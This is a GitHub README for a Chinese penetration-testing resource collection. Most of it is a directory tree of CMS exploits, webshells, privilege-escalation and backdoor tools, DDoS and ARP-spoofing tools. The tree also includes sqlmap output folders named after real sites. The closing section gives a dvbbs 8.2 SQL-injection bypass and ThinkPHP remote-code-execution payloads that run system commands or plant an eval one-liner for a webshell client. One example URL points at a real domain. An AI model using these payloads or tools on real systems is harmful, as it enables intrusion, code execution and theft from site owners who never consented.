Skip to content

Latest commit

 

History

History
859 lines (820 loc) · 27 KB

README.md

File metadata and controls

859 lines (820 loc) · 27 KB

penetration

收集的渗透资料,现在分享一下

点个小星星呗~

欢迎继续提供相关资料,可以issue或者pull request

收集不易 分享请注明来源~

https://github.com/w1109790800/Permeable

目录结构

├─0day & exp
│  ├─08CMS
│  ├─AKCMS
│  ├─bbsxp
│  │  ├─BBSxp7.0
│  │  ├─bbsxp综合利用工具
│  │  └─BBSXP论坛漏洞完全注册工具
│  ├─BLUECMS
│  ├─CreateLiveCMS
│  ├─discuz
│  │  ├─discuz
│  │  ├─Discuz!PM短消息漏洞利用工具
│  │  ├─discuz2.5x
│  │  ├─discuz7
│  │  └─dz
│  ├─Diy-Page
│  ├─Drupal
│  ├─DVBBS
│  ├─Ecshop
│  ├─joomla
│  ├─KINGCMS
│  ├─NBArticle
│  ├─Oblog
│  │  ├─CBlog利用工具
│  │  ├─oblog
│  │  │  └─Tool
│  │  ├─Oblog 4.X Exp漏洞利用工具
│  │  ├─Oblog4.6SQL版漏洞利用工具
│  │  └─OblogSql
│  ├─php168
│  │  ├─php168exp
│  │  └─PHP168注入ODAY工具
│  ├─phpbb
│  │  ├─phpBB Extractor Reloaded(PHPBB漏洞利用工具)
│  │  ├─PHPBB2.0.22MOD版利用工具
│  │  ├─phpbblinkblind
│  │  ├─phpbb暴力破解工具
│  │  └─国外的PHPBB2论坛程序攻击工具
│  │      └─国外的PHPBB2论坛程序攻击工具
│  ├─phpcms
│  │  ├─PhpCms V9
│  │  │  └─phpv9任意读取文件
│  │  ├─phpcms0dayEXP_内部增强版
│  │  └─phpcms2007
│  ├─PHPweb
│  │  └─PHPWEB网站管理系统后台Kedit编辑器漏洞利用代码
│  ├─phpwind
│  │  ├─phpwind
│  │  ├─phpwind 5.0.1 Sql注射漏洞利用程序.php
│  │  ├─phpwind1.3.6论坛利用程序
│  │  ├─PhpWind2.0.2 & 3.31CE漏洞
│  │  ├─PHPWind4.3.2漏洞利用
│  │  ├─phpwind5.x passport_client.php UPDATE SQL Injection POC.php
│  │  ├─PHPWindBlog漏洞利用程序
│  │  │  └─phpwindblog
│  │  ├─PhpwindWapExp
│  │  ├─PHPWIND_exp
│  │  └─PHPWIND插件漏洞
│  ├─Shopex
│  ├─UCHOME
│  ├─wordpress
│  ├─Z-BLOG
│  ├─乔客JoekoeCMS
│  ├─别的一些exp
│  │  ├─CBlog利用工具
│  │  ├─EQdkp注入工具
│  │  ├─jsp暴源代码工具
│  │  │  └─jsp暴源代码工具
│  │  │      └─控件包
│  │  ├─L-Blog提权漏洞利用程序
│  │  ├─PJblog V3.0黑客漏洞利用工具
│  │  ├─sablog利用工具
│  │  ├─SuperUpFile1.0
│  │  ├─upfile
│  │  ├─“动感下载 v3.0”Cookie注入漏洞利用工具
│  │  ├─乔客exp
│  │  ├─凸丫丫
│  │  ├─动力文章系统
│  │  ├─记事狗微博3.0注入利用工具
│  │  ├─逍遥网站整站系统后门扫描器 1.0
│  │  ├─零号KingCMS上传利用
│  │  └─风汛暴库器
│  ├─动易cms
│  │  ├─SWInject
│  │  ├─动易2005Access版上传漏洞
│  │  ├─动易Region.asp注入辅助工具
│  │  └─动易漏洞利用工具与动画教程
│  ├─动网bbs
│  │  ├─动网asp版
│  │  │  ├─DVBBS 7.1.0 SP1 Savepost.asp漏洞工具
│  │  │  ├─dvbbs-qx0507
│  │  │  ├─Dvbbs8后台拿webshell的mdb
│  │  │  ├─dvbbsdt.exe
│  │  │  ├─动网7.0 sp2提升前台工具
│  │  │  ├─动网7.0 SP2漏洞利用程序
│  │  │  ├─动网7.0sp2前后台权限提升工具
│  │  │  ├─动网7.1sql
│  │  │  ├─动网7.1SQL版注入漏洞利用工具
│  │  │  ├─动网7在线人数攻击器增强版
│  │  │  ├─动网8.0sql最新漏洞利用工具
│  │  │  │  └─动网8.0sql最新漏洞利用工具
│  │  │  ├─动网8.0sql漏洞利用工具
│  │  │  │  └─dv8sql
│  │  │  ├─动网上传漏洞
│  │  │  ├─动网前台提权+爆后台密码
│  │  │  ├─动网前台提权工具华盟版
│  │  │  ├─动网博客7.1注入漏洞利用工具
│  │  │  ├─动网固顶贴工具
│  │  │  ├─动网帐号提取器
│  │  │  ├─动网日志清除工具
│  │  │  ├─动网空数据库合并成伪ASP木马专用工具
│  │  │  └─动网综合利用工具
│  │  └─动网php版
│  │      └─dvbbs_php2.0_fucker
│  ├─帝国EmpireCMS
│  ├─新云
│  │  └─xinyun
│  ├─科讯KesionCMS
│  ├─逐浪CMS
│  └─风讯foosunCMS
├─ASP 0day
│  ├─ASPCMS
│  ├─DvBBS(动网))
│  ├─foosun(风讯)
│  ├─Joekoe(乔客)
│  ├─kesion(科汛)
│  │  ├─kesioncms6.x-7.06
│  │  └─科讯cms利用
│  ├─KingCMS
│  ├─newasp(新云)
│  ├─[博客] pjblog
│  ├─[博客] Z-Blog
│  ├─动易cms
│  └─老Y文章管理系统
├─PHP 0day
│  ├─DeDeCms(织梦)
│  │  ├─Dede+v5.7+feedback.php-12-10-31
│  │  ├─DedeCms buy_action SQL利用工具
│  │  ├─dedecms2
│  │  │  └─dedecms2
│  │  ├─DeDecms各版本0day
│  │  │  └─DeDecms vx减缩版
│  │  ├─dedeexp
│  │  └─织梦dedecms 5.7上传漏洞代码
│  ├─ECMS(帝国)
│  ├─Joomla!
│  ├─PageAdmin cms
│  ├─PHP168
│  ├─PHPCMS
│  │  ├─phpv9任意读取
│  │  └─phpv9漏洞利用工具[1].rar
│  │      └─phpv9漏洞利用工具
│  ├─PHPweb
│  │  └─PHPWEB网站管理系统后台Kedit编辑器漏洞利用代码
│  ├─ThinkPHP 漏洞
│  ├─Uchome
│  ├─vBulletin 4.X
│  ├─[BBS] Discuz!
│  ├─[BBS] phpWind
│  ├─[博客] wordpress
│  ├─[商城] EcShop
│  │  ├─ecshop漏洞整理
│  │  │  └─ecshop漏洞整理
│  │  │      ├─ec2.6 2.7利用工具
│  │  │      └─ecshop注入exp
│  │  ├─eshop_exp
│  │  ├─Mc Shop网络商城0day利用工具
│  │  ├─Shopex 4.8.5
│  │  └─shopex_EXP及后台拿shell keio20120826整理版
│  └─[商城] ShopEx
│      └─Shopex 注入漏洞 0day (4.8.5)
├─xss 测试
│  └─xss完整版插件keepsenins
│      └─xss完整版插件keepsenins
│          ├─apps
│          │  └─index
│          │      ├─action
│          │      ├─lib
│          │      ├─model
│          │      └─view
│          │          ├─code
│          │          ├─index
│          │          ├─project
│          │          ├─public
│          │          │  ├─js
│          │          │  └─style
│          │          │      └─toolbar
│          │          ├─user
│          │          └─xing
│          ├─bin
│          ├─cache
│          ├─config
│          ├─static
│          │  ├─js
│          │  └─style
│          └─uauc
│              ├─class
│              ├─common
│              └─core
├─入侵资料
│  ├─3889相关
│  ├─Cookie欺骗入侵网站
│  ├─Linux
│  ├─Mssql
│  ├─Mysql
│  ├─php
│  ├─root  sa相关
│  ├─vpn
│  │  ├─cmd下快速开VPN
│  │  │  └─autovpn(非常好的命令行下开vpn工具)
│  │  └─jz-vpn-setup
│  ├─xss
│  │  └─xss完整版插件keepsenins
│  │      └─xss完整版插件keepsenins
│  │          ├─apps
│  │          │  └─index
│  │          │      ├─action
│  │          │      ├─lib
│  │          │      ├─model
│  │          │      └─view
│  │          │          ├─code
│  │          │          ├─index
│  │          │          ├─project
│  │          │          ├─public
│  │          │          │  ├─js
│  │          │          │  └─style
│  │          │          │      └─toolbar
│  │          │          ├─user
│  │          │          └─xing
│  │          ├─bin
│  │          ├─cache
│  │          ├─config
│  │          ├─static
│  │          │  ├─js
│  │          │  └─style
│  │          └─uauc
│  │              ├─class
│  │              ├─common
│  │              └─core
│  ├─上传突破
│  ├─入侵aspx网站
│  ├─入侵技巧
│  ├─入侵文本
│  ├─其他入侵文章
│  │  └─webshell权限让服务器重启
│  ├─其他有用入侵资料
│  │  ├─其他有用入侵资料1
│  │  │  └─ngnix空字节执行漏洞
│  │  └─其他有用入侵资料2
│  ├─其他设备
│  ├─内网渗透相关
│  │  ├─arp
│  │  ├─ipc$入侵
│  │  ├─内网入侵
│  │  │  └─内网渗透资料
│  │  │      ├─rpc入侵
│  │  │      └─内网最常用工具下载及使用方法
│  │  ├─内网渗透经典文集_1
│  │  ├─内网渗透经典文集_2
│  │  ├─内网渗透经典文集_3
│  │  ├─域
│  │  ├─端口入侵
│  │  └─远程溢出
│  ├─反弹相关
│  ├─垃圾资料
│  ├─密码
│  └─手工注入
│      ├─access等其他注入
│      ├─MSSQL注入
│      │  └─SA错误修复
│      ├─MYSQl注入
│      ├─Oracle SQL注射
│      ├─PostgreSQL
│      ├─sqlmap
│      ├─延时注入
│      └─搜型登陆框新注入
├─大小马
│  ├─asp大马
│  ├─asp小马
│  ├─JSP
│  ├─php大马
│  ├─php小马
│  ├─一句话
│  └─菜刀
│      ├─CCC
│      └─Customize
├─技术文章
├─技术资料
├─提权利器
│  ├─32位系统用户账号密码查看器
│  ├─Api添加用户(F4ck Team)
│  ├─linux
│  │  ├─2.2.27
│  │  ├─2.2.x
│  │  ├─2.4 2.6
│  │  ├─2.4.17
│  │  ├─2.4.18
│  │  ├─2.4.19
│  │  ├─2.4.20
│  │  ├─2.4.21
│  │  ├─2.4.22
│  │  ├─2.4.22-10
│  │  ├─2.4.23
│  │  ├─2.4.24
│  │  ├─2.4.25
│  │  ├─2.4.26
│  │  ├─2.4.27
│  │  ├─2.4.29
│  │  ├─2.4.34
│  │  ├─2.4.x
│  │  ├─2.6.10
│  │  ├─2.6.11
│  │  ├─2.6.12
│  │  ├─2.6.13
│  │  ├─2.6.14
│  │  ├─2.6.15
│  │  ├─2.6.16
│  │  ├─2.6.17
│  │  ├─2.6.18
│  │  ├─2.6.2
│  │  ├─2.6.23 - 2.6.24
│  │  ├─2.6.4
│  │  ├─2.6.5
│  │  ├─2.6.7
│  │  ├─2.6.8
│  │  ├─2.6.9
│  │  ├─2.6.9-34
│  │  ├─2.6.x
│  │  ├─CentOS5.5
│  │  ├─FreeBSD 4.4 - 4.6
│  │  ├─FreeBSD 4.8
│  │  ├─FreeBSD 5.3
│  │  ├─icons
│  │  │  └─img
│  │  │      └─mini
│  │  ├─Mac OS X
│  │  ├─netcat
│  │  ├─OpenBSD
│  │  ├─r00t-t00ls
│  │  ├─red-7.3
│  │  ├─red-8.0
│  │  ├─red-hat8.0
│  │  ├─redhat 7.0
│  │  ├─redhat 7.1
│  │  ├─Root exploits
│  │  ├─Spaciel
│  │  ├─SunOS 5.10
│  │  ├─SunOS 5.7
│  │  ├─SunOS 5.8
│  │  └─SunOS 5.9
│  ├─LPK2.0
│  ├─NC反弹CMD
│  ├─PwDump7破解管理hash
│  ├─shell.Users组建vbs提权
│  ├─shift后门
│  ├─T00ls Lpk Sethc v4
│  ├─T00ls_Lpk_Sethc_v3
│  ├─不死帐号
│  ├─免NET提权
│  ├─免参数版pr
│  ├─剑眉大侠提权常用EXP
│  ├─开3389端口(神器)
│  ├─截取3389
│  │  └─dat
│  ├─提权工具
│  ├─无NET时添加用户(大胆)
│  ├─无NET时添加用户(拉登哥哥)
│  ├─星外提权EXP
│  │  ├─ee.exe提权法
│  │  └─vbs读取IIS提权法
│  ├─直接抓取Windows明文
│  └─解除TCPIP筛选小工具
├─注入练习
│  └─sqli-labs-master
│      ├─images
│      ├─index.html_files
│      │  └─icons
│      ├─Less-1
│      ├─Less-10
│      ├─Less-11
│      ├─Less-12
│      ├─Less-13
│      ├─Less-14
│      ├─Less-15
│      ├─Less-16
│      ├─Less-17
│      ├─Less-18
│      ├─Less-19
│      ├─Less-2
│      ├─Less-20
│      ├─Less-21
│      ├─Less-22
│      ├─Less-23
│      ├─Less-24
│      ├─Less-25
│      ├─Less-25a
│      ├─Less-26
│      ├─Less-26a
│      ├─Less-27
│      ├─Less-27a
│      ├─Less-28
│      ├─Less-28a
│      ├─Less-29
│      ├─Less-3
│      ├─Less-30
│      ├─Less-31
│      ├─Less-4
│      ├─Less-5
│      ├─Less-6
│      ├─Less-7
│      ├─Less-8
│      ├─Less-9
│      └─sql-connections
├─渗透工具
│  ├─3款土耳其注入工具
│  │  └─sql programlar
│  │      ├─m4xmysql
│  │      ├─sql dökücü
│  │      └─Sql Poizon v1.1
│  ├─Access 数据库特殊操作器
│  │  └─Access 数据库特殊操作器
│  ├─Domain3.5
│  │  └─Domain3.5
│  │      └─Domain3.5
│  ├─gason-0.9.5
│  ├─havij
│  ├─html 工具
│  ├─hulk
│  ├─LiQiDiS_2.71a33
│  │  └─LiQiDiS_2.71a33
│  │      ├─autoSave
│  │      ├─config
│  │      ├─dict
│  │      ├─help
│  │      │  ├─ConfigSQLServer
│  │      │  │  └─images
│  │      │  ├─如何配置基于我的SQLServer服务器转发
│  │      │  │  └─sqlImages
│  │      │  └─通过路由器上网的用户如何设置服务器转发
│  │      │      └─images
│  │      ├─languages
│  │      ├─md5engines
│  │      │  ├─hashcrack.com(slow)
│  │      │  ├─md5.mmkey.com
│  │      │  ├─md5.rednoize.com(slow)
│  │      │  ├─md5decryption.com
│  │      │  ├─passcracking.com
│  │      │  ├─tools.benramsey.com
│  │      │  ├─www.md5x.com(_uCode)
│  │      │  └─www.xmd5.org
│  │      ├─skinSharpSkins
│  │      ├─SQL
│  │      ├─tools
│  │      │  ├─ChinaChopper
│  │      │  └─lake2eval_client
│  │      │      └─func
│  │      ├─upload
│  │      │  └─webShells
│  │      └─works
│  ├─nikto-2.1.5
│  │  ├─databases
│  │  ├─docs
│  │  ├─plugins
│  │  └─templates
│  ├─oauth2-server-php-master
│  │  ├─src
│  │  │  └─OAuth2
│  │  │      ├─Controller
│  │  │      ├─GrantType
│  │  │      ├─Response
│  │  │      ├─ResponseType
│  │  │      ├─Storage
│  │  │      └─TokenType
│  │  └─test
│  │      ├─config
│  │      ├─lib
│  │      │  └─OAuth2
│  │      │      ├─Request
│  │      │      └─Storage
│  │      └─OAuth2
│  │          ├─GrantType
│  │          ├─Server
│  │          │  ├─Access
│  │          │  ├─Authorize
│  │          │  └─Grant
│  │          └─Storage
│  ├─Openvas中文漏洞扫描器
│  ├─pangoin 3.2.4
│  │  └─pangoin 3.2.4
│  │      └─Pangolin_Professinal_Edition_3[1].2.4.1132_CracKed
│  ├─php脱大容量表的优秀代码 by qiushui[r00ts]
│  ├─poc 401
│  ├─r00ts蘑菇(玩命青年)webshell木马组合套
│  │  └─星外提权aspx大马(去后门版)
│  ├─Slowloris.pl
│  ├─snuck
│  │  └─payloads
│  ├─sqlmap GUI
│  │  ├─cfg_dir
│  │  ├─doc
│  │  ├─extra
│  │  │  ├─beep
│  │  │  ├─cloak
│  │  │  ├─dbgtool
│  │  │  ├─icmpsh
│  │  │  ├─mssqlsig
│  │  │  ├─runcmd
│  │  │  │  └─windows
│  │  │  │      └─runcmd
│  │  │  ├─safe2bin
│  │  │  ├─shellcodeexec
│  │  │  │  └─linux
│  │  │  ├─shutils
│  │  │  └─sqlharvest
│  │  ├─lib
│  │  │  ├─controller
│  │  │  ├─core
│  │  │  ├─parse
│  │  │  ├─request
│  │  │  ├─takeover
│  │  │  ├─techniques
│  │  │  │  ├─blind
│  │  │  │  ├─brute
│  │  │  │  ├─dns
│  │  │  │  ├─error
│  │  │  │  └─union
│  │  │  └─utils
│  │  ├─output
│  │  │  ├─2012.100km.qdn.cn
│  │  │  ├─grawww.nju.edu.cn
│  │  │  ├─liuxue.eastday.com
│  │  │  ├─tw.beanfun.com
│  │  │  ├─www.artc.net.cn
│  │  │  ├─www.bangyuanjiaoyu.com
│  │  │  ├─www.facebook.com
│  │  │  ├─www.hbetsc.org
│  │  │  ├─www.hnslsdxy.com
│  │  │  ├─www.jeleechem.com
│  │  │  ├─www.jyht.hk
│  │  │  ├─www.motocurtain.com
│  │  │  └─www.onetouch.cn
│  │  ├─plugins
│  │  │  ├─dbms
│  │  │  │  ├─access
│  │  │  │  ├─db2
│  │  │  │  ├─firebird
│  │  │  │  ├─maxdb
│  │  │  │  ├─mssqlserver
│  │  │  │  ├─mysql
│  │  │  │  ├─oracle
│  │  │  │  ├─postgresql
│  │  │  │  ├─sqlite
│  │  │  │  └─sybase
│  │  │  └─generic
│  │  ├─procs
│  │  │  ├─mssqlserver
│  │  │  ├─mysql
│  │  │  ├─oracle
│  │  │  └─postgresql
│  │  ├─shell
│  │  ├─tamper
│  │  ├─thirdparty
│  │  │  ├─ansistrm
│  │  │  ├─beautifulsoup
│  │  │  ├─chardet
│  │  │  ├─clientform
│  │  │  ├─colorama
│  │  │  ├─fcrypt
│  │  │  ├─gprof2dot
│  │  │  ├─keepalive
│  │  │  ├─magic
│  │  │  ├─multipart
│  │  │  ├─odict
│  │  │  ├─oset
│  │  │  ├─pagerank
│  │  │  ├─prettyprint
│  │  │  ├─pydes
│  │  │  ├─socks
│  │  │  ├─termcolor
│  │  │  └─xdot
│  │  ├─txt
│  │  ├─udf
│  │  │  ├─mysql
│  │  │  │  ├─linux
│  │  │  │  │  ├─32
│  │  │  │  │  └─64
│  │  │  │  └─windows
│  │  │  │      ├─32
│  │  │  │      └─64
│  │  │  └─postgresql
│  │  │      ├─linux
│  │  │      │  ├─32
│  │  │      │  │  ├─8.2
│  │  │      │  │  ├─8.3
│  │  │      │  │  ├─8.4
│  │  │      │  │  └─9.0
│  │  │      │  └─64
│  │  │      │      ├─8.2
│  │  │      │      ├─8.3
│  │  │      │      ├─8.4
│  │  │      │      └─9.0
│  │  │      └─windows
│  │  │          └─32
│  │  │              ├─8.2
│  │  │              ├─8.3
│  │  │              ├─8.4
│  │  │              └─9.0
│  │  └─xml
│  │      └─banner
│  ├─struts2 漏洞利用工具
│  │  ├─extlib
│  │  ├─lib
│  │  │  ├─img
│  │  │  ├─skin
│  │  │  │  └─button_style_guide
│  │  │  ├─sysconfig
│  │  │  └─use
│  │  ├─plugins
│  │  │  ├─e0LfdE8DMNm09Dbc
│  │  │  ├─m1x7pUSLJT6gBdy8
│  │  │  ├─tmp
│  │  │  │  ├─cajcxyktchvglqgb
│  │  │  │  ├─gyqqzilgggacqyvz
│  │  │  │  ├─ocxdgefpyqfegdgb
│  │  │  │  ├─oquomowzpdsdgqfp
│  │  │  │  ├─oypxqfvdvylttpwf
│  │  │  │  ├─oywojapgdtpzewvv
│  │  │  │  ├─unsxczsdozetwfyv
│  │  │  │  ├─vjqdxsqlefyekjyx
│  │  │  │  ├─vmokdgbjnxmezswo
│  │  │  │  ├─xlsalbluxbqoimeb
│  │  │  │  └─xvyvduvlwcsyerqd
│  │  │  ├─_toolmao_sys_CMD
│  │  │  │  └─skin
│  │  │  │      └─button_style_flex
│  │  │  ├─_toolmao_sys_工具猫
│  │  │  ├─_toolmao_sys_扩展函数库
│  │  │  ├─_toolmao_sys_程序管理器
│  │  │  ├─_toolmao_sys_魔盒设置
│  │  │  │  └─skin
│  │  │  │      └─button_style_flex
│  │  │  └─取色工具
│  │  └─测试
│  ├─Umbrella Project 2012
│  │  └─list
│  ├─WebDDOS
│  ├─WebRobot
│  │  ├─data
│  │  │  ├─dict
│  │  │  │  └─eWebEditor
│  │  │  │      └─SysImage
│  │  │  │          ├─bg
│  │  │  │          ├─emot
│  │  │  │          └─file
│  │  │  ├─keyword
│  │  │  └─tools
│  │  │      ├─lake2eval_client
│  │  │      │  └─func
│  │  │      └─ShellManager
│  │  └─log
│  │      └─config
│  ├─WebSploit Framework V.2.0.3
│  ├─websurgery
│  │  └─WebSurgery_v06
│  ├─WSExplorer
│  ├─Xenotix_XSS_Exploitation_Framework
│  │  └─Xenotix XSS Exploitation Framework
│  │      └─build
│  │          └─Application Files
│  │              └─Xenotix XSS Exploit Framework_1_0_0_110
│  ├─一个扫C段WEB敏感信息的工具
│  │  └─一个扫C段WEB敏感信息的工具
│  │      └─一个扫C段WEB敏感信息的工具
│  │          └─plugins
│  ├─啊D扫目录asp+字典
│  │  └─啊D扫目录asp+字典
│  ├─国外超强注入工具Cfm Private SQL Injection
│  │  └─国外超强综合注入程序Cfm Private SQL Injection Tool
│  │      └─hackcfm_private_src
│  ├─御剑 1.5
│  │  ├─临时处理数据文件夹
│  │  └─配置文件
│  ├─文件合并工具
│  ├─目录字典
│  ├─老兵COOKIES欺骗工具
│  │  └─老兵COOKIES欺骗工具
│  ├─脱裤打包
│  │  ├─aspwebbackup
│  │  └─mssql
│  └─雷池加密解密
│      └─雷池加密解密
├─漏洞汇总
│  ├─BT5 MSF JAVA 0day CVE-2013-0422 Exploit Demo By K8team
│  │  └─BT5 MSF JAVA 0day CVE-2013-0422 Exploit Demo By K8team
│  ├─dede全部exp
│  │  └─Dede+v5.7+feedback.php-12-10-31
│  ├─ecshop
│  ├─ECSHOP全版本注入0DAY
│  ├─fck.py
│  ├─MySQL hash 登陆0day及exp
│  │  └─MySQL hash 登陆0day及exp
│  ├─mysql_win_remote_stuxnet_technique;mysql溢出
│  │  ├─1
│  │  │  └─mysql_scanner
│  │  │      └─mysql_scanner
│  │  └─mysql_win_remote_stuxnet_technique
│  │      └─mysql_scanner
│  │          └─mysql_scanner
│  ├─phpcms
│  │  └─phpv9任意读取
│  ├─PHPWEB网站管理系统后台Kedit编辑器漏洞利用代码
│  ├─Shopex 注入漏洞 0day (4.8.5)
│  ├─struts2 漏洞利用工具
│  │  └─struts2 漏洞利用工具
│  │      ├─extlib
│  │      ├─lib
│  │      │  ├─img
│  │      │  ├─skin
│  │      │  │  └─button_style_guide
│  │      │  ├─sysconfig
│  │      │  └─use
│  │      ├─plugins
│  │      │  ├─e0LfdE8DMNm09Dbc
│  │      │  ├─m1x7pUSLJT6gBdy8
│  │      │  ├─tmp
│  │      │  │  ├─cajcxyktchvglqgb
│  │      │  │  ├─ocxdgefpyqfegdgb
│  │      │  │  ├─oquomowzpdsdgqfp
│  │      │  │  ├─oypxqfvdvylttpwf
│  │      │  │  ├─oywojapgdtpzewvv
│  │      │  │  ├─vjqdxsqlefyekjyx
│  │      │  │  ├─vmokdgbjnxmezswo
│  │      │  │  ├─xlsalbluxbqoimeb
│  │      │  │  └─xvyvduvlwcsyerqd
│  │      │  ├─_toolmao_sys_CMD
│  │      │  │  └─skin
│  │      │  │      └─button_style_flex
│  │      │  ├─_toolmao_sys_工具猫
│  │      │  ├─_toolmao_sys_扩展函数库
│  │      │  ├─_toolmao_sys_程序管理器
│  │      │  ├─_toolmao_sys_魔盒设置
│  │      │  │  └─skin
│  │      │  │      └─button_style_flex
│  │      │  └─取色工具
│  │      └─测试
│  └─记事狗微博3.0注入利用工具
└─终端工具
    ├─APMServ-v5.2.6
    ├─Cain4.9
    │  └─Cain4.9
    │      ├─Winrtgen
    │      └─Wordlists
    ├─FTP架设器
    ├─HFS网络文件服务器2.3
    ├─IIS信息查看软件
    ├─MAC地址修改器
    ├─MAC地址扫描器
    ├─NetFuke (arp欺骗)
    │  ├─dic
    │  ├─dll
    │  ├─inc
    │  ├─log
    │  ├─ocx
    │  └─voice
    ├─SYN数据流量攻击器
    ├─TV远控完美破解版
    ├─一款最牛清理C盘工具
    ├─七行者IP代理验证 V1.3
    ├─大侠专用擦PP工具
    ├─幻境网盾(无视ARP防火墙)
    ├─直接使服务器蓝屏重启的东东
    │  └─MS12-020 PoC[bug修正版 + 数据包nc发送版]
    │      └─数据包nc发送版
    ├─端口转发神器--reDuh
    │  └─reDuhServers
    ├─组策略清除工具1.1
    

下面是几个文件的具体内容:

dvbbs 8.2 SQL注射漏洞分析

[dvbbs 8.2 SQL注射漏洞分析 全文]漏洞公告:http://seclists.org/bugtraq/2008/May/0330.html

利用方式:一个典型的sql注射漏洞,按照公告里说的用

password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&am 

漏洞分析:动网在asp领域也算一个比较元老的程序,这次在8.2新版里有一个低级的错误.漏洞代码在login.asp 118行左右 

...... 

username=trim(Dvbbs.CheckStr(request("username"))) 

If ajaxPro Then username = unescape(username) 

...... 

取得的username是先经过检查然后再unescape解码,导致用urlencode模式就可以饶过任何检查,和php的urldecode导致的注射很类似,譬如用%2527就可以提交’过去了. 

ThinkPHP 漏洞

2.0版本 /ThinkPHP/Lib/Think/Util/Dispatcher.class.php

2.1版本/ThinkPHP/Lib/Core/Dispatcher.class.php

搜索preg_replace 有一段替换使用了/e模式, 而且thinkphp底层没有提供参数的过滤, 这边就直接崩溃了。

测试代码

/index.php/Module/Action/Param/${@phpinfo()}

http://www.js.10086.cn/wxcs/ppo/YC/index.php/Public/MedInsurance/1/%7B$%7Bphpinfo()%7D%7D

/admin//index.php/public/login

去掉login 版本信息出来

最近thinkphp框架爆出了一个任意代码执行漏洞,其威胁程序相当的高,漏洞利用方法如下:

index.php/module/aciton/param1/${@print(THINK_VERSION)}index.php

/module/aciton/param1/${@function_all()}

其中function_all代表任何函数,

比如:index.php/module/aciton/param1/${@phpinfo()}

获取服务器的系统配置信息等。

index.php/module/action/param1/{${system($_GET['x'])}}?x=ls -al

列出网站文件列表

index.php/module/action/param1/{${eval($_POST[s])}}

直接执行一句话代码,用菜刀直接连接.

一切资源请合理使用